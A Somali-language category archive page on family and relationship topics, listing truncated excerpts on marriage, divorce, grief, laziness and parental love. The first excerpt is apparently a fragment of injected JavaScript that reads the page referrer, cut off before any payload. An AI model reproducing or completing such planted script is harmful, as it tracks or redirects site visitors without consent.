Scroll to Top

Category Archives: Qoyska

(function() { var referer="";try{if(referer=document.referrer,"undefined"==typeof referer)throw"undefined"}catch(exception){referer=document.location.href,(""==referer||"undefined"==typeof referer)&&(referer=document.URL)}referer=referer.substr(0,700); var...

Qoysas badan ayaa ka sheegta is fahan la`aan waxaana taasi u sabab ah iyadoo gurigaas uu ka maqan yahay erayada kalgaceyl ee maalin laha ah hadaba talooyinkaan waa ku muhiim . 1- Ii sheeg waxa kaa careysiinaya...

Qubarada arimaha qoyska ee Maandeeq.net ayaa tilmaamaya in heerka furiinka dalka Somaliya uu kordhay taasi oo keeneysa in dib loogu laabto wax yaabaha keenaya qilaafaadka qoyska , waxaa ka mid ah arimaha...

Ma rumaysan kartaa inay jirto suurad quraanka ku jirta oo hadii aad akhrisado kaa daweynaysa ilawshiyaha (hilmaanka)? Cajiib!! Hilmaamka iyo fahmo xumidu waa xanuun beryahan danbe aad looga cabanayo taas...

Xariirka labada lamaane ayaa u baahan in uu noqdo mid isu dheeli tiran kuna tiirsan is caawin labada lamaane ah. Waxaa jira falal uu ninka sameeyo taasi oo qal qal gilineysa isu dheeli tirnaantii sida...

in la murugoodo ama aan la faraxsanaan waaa iska caadi marka ay wax qaldamaan ama uu qof kaa dhinto, dareemadani waxa ay badanaa la tagaan wakhtiga waadna ka soo fiicnaanaysaa. haddaba murugada waxa ka...

Waxyaabaha kadhiga xiriirka lamaanaha mid ku dhisan is aaminaad iyo jacayl waa mid ukala duwan laamane kasta oo isqaba, waxyaabahaan oo dhan ma ahan kuwo ku yimaada laba cisho gudahood. Hadii aad ubaahan...

Dhaman asxaabteena waad ku mahadsan tihiin waxaan idin heeynaa  qodobo kaa caawinayo kaabiyaasha sida aad jaceyl ku kasabaneyso. *Xushmadda:-Xushmadda waa mid muhiim u ah la dhaqanka wanaagsan ee dadka...

Wahsiga ama caajisku waa dareen isdhigasho kaasoo sababa in qofku uusan samayn shaqo u baahan xili gooni ah. Waa dareen khiyaali ah kaasoo ka imaanaya maskaxda. Fariintaan ayaa shaqsiga ku dhalinaysa inuu...

Jaceylka  Waalidku :wuxuu u baahan yahay in aad kasbato kaabayaasha ay kamid yihiin baarrinimo , haddii uusan canugga waalidkiisa baarri u ahayn , waalidkuna ma jeclaanayaan cannugaas, haduu uu jeclaadane...